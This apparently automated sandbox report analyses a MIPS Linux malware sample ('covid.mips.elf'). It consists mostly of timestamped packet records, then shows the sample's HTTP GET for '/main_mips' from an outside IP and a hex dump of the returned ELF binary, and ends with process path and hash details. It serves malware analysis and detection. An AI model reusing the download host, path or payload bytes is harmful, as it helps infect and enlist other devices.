    Jan 6, 2025 16:32:54.400118113 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.400130033 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.400136948 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.400444984 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.400487900 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.400496960 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.400583982 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.400646925 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.400657892 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.401165962 CET4776280192.168.2.14185.255.135.104
    Jan 6, 2025 16:32:54.538152933 CET4776280192.168.2.14185.255.135.104
    Jan 6, 2025 16:32:54.543504953 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.543519020 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.543529034 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.543632984 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.543644905 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.543656111 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.543667078 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.543914080 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.543925047 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.544047117 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.544058084 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.544073105 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.544084072 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.544303894 CET4776280192.168.2.14185.255.135.104
    Jan 6, 2025 16:32:54.544331074 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.544342995 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.544353962 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.544648886 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.545847893 CET4776280192.168.2.14185.255.135.104
    Jan 6, 2025 16:32:54.549698114 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.549710035 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.549721003 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.550355911 CET4776280192.168.2.14185.255.135.104
    Jan 6, 2025 16:32:54.765691042 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.765763998 CET4776280192.168.2.14185.255.135.104
    Jan 6, 2025 16:32:54.803687096 CET4776280192.168.2.14185.255.135.104
    Jan 6, 2025 16:32:54.809165955 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.809200048 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.809212923 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.809361935 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.809374094 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.809385061 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.809396029 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.809473991 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.809545040 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.809561014 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.809674978 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.809693098 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.809705019 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.809717894 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.809809923 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:54.810039997 CET4776280192.168.2.14185.255.135.104
    Jan 6, 2025 16:32:55.029772997 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:55.029890060 CET4776280192.168.2.14185.255.135.104
    Jan 6, 2025 16:32:55.121997118 CET4776280192.168.2.14185.255.135.104
    Jan 6, 2025 16:32:55.126846075 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:55.126924992 CET4776280192.168.2.14185.255.135.104
    Jan 6, 2025 16:32:55.127132893 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:55.127151012 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:55.127274036 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:55.127594948 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:55.127604961 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:55.127615929 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:55.127758026 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:55.128400087 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:55.128410101 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:55.128422976 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:55.128557920 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:55.128931999 CET4776280192.168.2.14185.255.135.104
    Jan 6, 2025 16:32:55.129106045 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:55.129264116 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:55.129276037 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:55.129287958 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:55.131258011 CET4776280192.168.2.14185.255.135.104
    Jan 6, 2025 16:32:55.133913040 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:55.133924007 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:55.133935928 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:55.136081934 CET4776280192.168.2.14185.255.135.104
    Jan 6, 2025 16:32:55.136105061 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:55.177548885 CET4776280192.168.2.14185.255.135.104
    Jan 6, 2025 16:32:55.397953033 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:55.398058891 CET4776280192.168.2.14185.255.135.104
    Jan 6, 2025 16:32:55.494044065 CET4776280192.168.2.14185.255.135.104
    Jan 6, 2025 16:32:55.499269009 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:55.499406099 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:55.499417067 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:55.499582052 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:55.499594927 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:55.499929905 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:55.499939919 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:55.499950886 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:55.500106096 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:55.500117064 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:55.500747919 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:55.500758886 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:55.500768900 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:55.500919104 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:55.500931025 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:55.501030922 CET4776280192.168.2.14185.255.135.104
    Jan 6, 2025 16:32:55.725709915 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:55.725755930 CET4776280192.168.2.14185.255.135.104
    Jan 6, 2025 16:32:56.026983023 CET4776280192.168.2.14185.255.135.104
    Jan 6, 2025 16:32:56.033314943 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:56.033329010 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:56.033339977 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:56.033349991 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:56.033360958 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:56.033370972 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:56.033371925 CET4776280192.168.2.14185.255.135.104
    Jan 6, 2025 16:32:56.033381939 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:56.033452988 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:56.033463001 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:56.033473969 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:56.033885956 CET8047762185.255.135.104192.168.2.14
    Jan 6, 2025 16:32:56.034388065 CET4776280192.168.2.14185.255.135.104
    Jan 6, 2025 16:32:57.334971905 CET4776280192.168.2.14185.255.135.104
    Jan 6, 2025 16:32:57.339776993 CET8047762185.255.135.104192.168.2.14
    Session IDSource IPSource PortDestination IPDestination Port
    0192.168.2.1447762185.255.135.10480
    TimestampBytes transferredDirectionData
    Jan 6, 2025 16:32:53.497143984 CET46OUTGET /main_mips HTTP/1.0
    Data Raw: 00 44 6f 77 6e 6c 6f
    Data Ascii: Downlo
    Jan 6, 2025 16:32:54.170885086 CET1236INHTTP/1.1 200 OK
    Date: Mon, 06 Jan 2025 15:32:54 GMT
    Server: Apache/2.4.6 (CentOS)
    Last-Modified: Thu, 02 Jan 2025 08:25:43 GMT
    ETag: "2a660-62ab4e87cff6d"
    Accept-Ranges: bytes
    Content-Length: 173664
    Connection: close
    Data Raw: 7f 45 4c 46 01 02 01 00 00 00 00 00 00 00 00 00 00 02 00 08 00 00 00 01 00 40 02 60 00 00 00 34 00 02 a4 30 00 00 10 07 00 34 00 20 00 03 00 28 00 0e 00 0d 00 00 00 01 00 00 00 00 00 40 00 00 00 40 00 00 00 02 49 10 00 02 49 10 00 00 00 05 00 01 00 00 00 00 00 01 00 02 50 00 00 46 50 00 00 46 50 00 00 00 53 cc 00 00 ab a0 00 00 00 06 00 01 00 00 64 74 e5 51 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 00 00 00 04 3c 1c 00 07 27 9c 19 bc 03 99 e0 21 27 bd ff e0 af bc 00 10 af bf 00 1c af bc 00 18 04 11 00 01 00 00 00 00 3c 1c 00 07 27 9c 19 98 03 9f e0 21 8f 99 80 24 00 00 00 00 27 39 01 dc 03 20 f8 09 00 00 00 00 8f bc 00 10 00 00 00 00 04 11 00 01 00 00 00 00 3c 1c 00 07 27 9c 19 68 03 9f e0 21 8f 99 80 20 00 00 00 00 27 39 20 b0 03 20 f8 09 00 00 00 00 8f bc 00 10 00 00 00 00 8f bf 00 1c 00 00 00 00 03 e0 00 08 27 bd 00 20 3c 1c 00 07 27 9c 19 30 03 99 e0 21 27 bd ff d8 af bf 00 20 af b1 00 1c af b0 00 18 af bc 00 10 8f 91 80 18 00 00 00 00 92 22 a4 20 00 00 00 00 14 40 [TRUNCATED]
    Data Ascii: ELF@`404 (@@IIPFPFPSdtQ<'!'<'!$'9 <'h! '9 ' <'0!' " @PY $B PPY $Bh@$ h $I$" '(<'t!' ``$I@$$ P@$P ' ' !<'!!'$$'T$ <'!'$$H $ !(!$ 8!$C' H $<'!'H $<'!'0,($ l!!0K 0@!l$pC`0,
    Jan 6, 2025 16:32:54.170945883 CET248INData Raw: b4 00 28 8f b3 00 24 8f b2 00 20 8f b1 00 1c 8f b0 00 18 03 e0 00 08 27 bd 00 38 8f 99 85 6c 00 00 00 00 03 20 f8 09 00 00 00 00 8f bc 00 10 00 40 18 21 8f 82 86 38 10 70 00 15 ac 43 00 00 14 60 00 17 00 00 00 00 8f 99 87 d8 00 00 00 00 03 20 f8
    Data Ascii: ($ '8l @!8pC` ! @ ! $H !FCdQ(!$d
    Jan 6, 2025 16:32:54.171000004 CET1236INData Raw: 00 00 00 90 82 00 04 00 00 00 00 10 51 00 0b 24 63 00 04 24 a5 00 01 14 c5 ff f8 00 00 00 00 8f 99 87 d8 00 00 00 00 03 20 f8 09 24 04 00 05 8f bc 00 10 10 00 ff db 00 00 00 00 8c 99 00 00 8f a7 00 4c 02 40 20 21 02 a0 28 21 03 20 f8 09 02 60 30
    Data Ascii: Q$c$ $L@ !(! `0!<' !' &&$@@ ! & '(000
    Jan 6, 2025 16:32:54.171051025 CET1236INData Raw: 99 86 c8 24 04 00 01 8f 90 83 9c 03 20 f8 09 24 05 00 08 8f bc 00 10 92 05 00 00 8f 92 86 a8 00 40 88 21 8f 82 84 4c 8f 99 85 b0 8e 44 00 00 00 05 28 80 ae 22 00 00 24 a5 00 04 03 20 f8 09 a2 20 00 04 92 04 00 00 8f bc 00 10 00 04 18 80 8f 99 86
    Data Ascii: $ $@!LD("$ b!$qB$ $@!D$(#" $b!$qB$ $@!D$(
    Jan 6, 2025 16:32:54.171067953 CET1236INData Raw: 00 20 21 24 06 00 03 34 07 ff ff 02 20 28 21 03 20 f8 09 af a2 00 44 8f bc 00 18 02 00 20 21 8f 99 84 14 02 20 28 21 24 06 00 04 24 07 00 40 03 20 f8 09 af a2 00 64 8f bc 00 18 30 42 00 ff 8f 99 84 14 02 00 20 21 02 20 28 21 24 06 00 05 00 00 38
    Data Ascii: !$4 (! D ! (!$$@ d0B ! (!$8! < !$4 (! ! (!$4 ` ! (!$4 \ ! (!$4 X ! (!$8!
    Jan 6, 2025 16:32:54.171116114 CET720INData Raw: bc 00 18 24 50 00 01 02 13 18 2a 14 60 ff 8b af b0 00 20 8f a3 00 30 00 00 00 00 24 74 00 14 1a 60 ff ff 00 00 00 00 af a0 00 20 32 95 ff ff 00 00 20 21 00 04 18 c0 00 04 11 40 00 43 10 23 00 5e 28 21 8f a2 00 68 00 04 18 80 00 62 18 21 90 a2 00
    Data Ascii: $P*` 0$t` 2 !@C#^(!hb!q,B @G&2($bU@4P[8p_4PeXpiTPo,`s !$ !<
    Jan 6, 2025 16:32:54.171192884 CET1236INData Raw: e0 20 21 8f bc 00 18 8f bf 00 ac 8f be 00 a8 8f b7 00 a4 8f b6 00 a0 8f b5 00 9c 8f b4 00 98 8f b3 00 94 8f b2 00 90 8f b1 00 8c 8f b0 00 88 03 e0 00 08 27 bd 00 b0 8f a2 00 30 00 00 00 00 24 56 00 28 1a 60 ff 45 24 54 00 14 10 00 ff 46 af a0 00
    Data Ascii: !'0$V(`E$TF <'!'|xtplhd`\X0 !$! 0(! !$8! P0B(!$4 ! H
    Jan 6, 2025 16:32:54.171205044 CET1236INData Raw: 04 18 c0 00 04 11 40 00 43 10 23 8f a3 00 84 00 00 00 00 00 43 28 21 00 04 18 80 8f a4 00 50 90 a2 00 14 00 64 18 21 8c 71 00 00 2c 42 00 20 26 32 00 18 14 40 00 50 26 33 00 2c 8f a4 00 4c 24 02 ff ff 10 82 00 5f 00 00 00 00 34 10 ff ff 12 b0 00
    Data Ascii: @C#C(!Pd!q,B &2@P&3,L$_4c<Pk8po,s"B0@v !$ @ !"$ @B<f@ !`(!8!
    Jan 6, 2025 16:32:54.171216011 CET1236INData Raw: 00 38 21 03 20 f8 09 af a2 00 40 8f bc 00 18 af a2 00 3c 8f 82 86 84 8f 99 88 4c 8c 47 00 00 02 00 28 21 02 20 20 21 03 20 f8 09 24 06 00 19 8f bc 00 18 24 04 00 02 8f 99 87 9c 24 05 00 03 24 06 00 06 00 40 b8 21 03 20 f8 09 24 10 ff ff 00 12 96
    Data Ascii: 8! @<LG(! ! $$$$@! $P\@!D$$ !(!$ ' PJ`\0B4X0c0B,(` LH0eD0F0g@<0H0i3%@
    Jan 6, 2025 16:32:54.171376944 CET1236INData Raw: e2 ff b0 ae 30 00 10 8f 99 85 64 00 00 00 00 03 20 f8 09 34 10 ff ff 8f a3 00 34 8f bc 00 18 14 70 ff ac ae 22 00 0c 8f 99 85 64 00 00 00 00 03 20 f8 09 00 00 00 00 8f bc 00 18 a6 22 00 04 8f a2 00 2c 00 00 00 00 14 50 ff a6 00 00 00 00 8f 99 85
    Data Ascii: 0d 44p"d ",Pd (p"d BTPd PpBd Bd BX
    Jan 6, 2025 16:32:54.175870895 CET1236INData Raw: 20 f8 09 24 05 00 01 8f a3 00 68 00 10 20 80 00 83 20 21 8f a3 00 20 8f bc 00 18 ac 82 00 00 8f a2 00 68 00 03 18 80 00 62 18 21 8c 70 00 00 3c 03 0f ff 8e 02 00 00 34 63 ff ff 00 43 10 24 3c 03 40 00 00 43 10 25 3c 03 f0 ff 34 63 ff ff 00 43 10
    Data Ascii: $h ! hb!p<4cC$<@C%<4cC$<C%<dD@&$@$ (@C#^!C84"#<4cC$<PC%<4cC$


    System Behavior

    Start time (UTC):15:32:52
    Start date (UTC):06/01/2025
    Path:/tmp/covid.mips.elf
    Arguments:/tmp/covid.mips.elf
    File size:5777432 bytes
    MD5 hash:0083f1f0e77be34ad27f849842bbb00c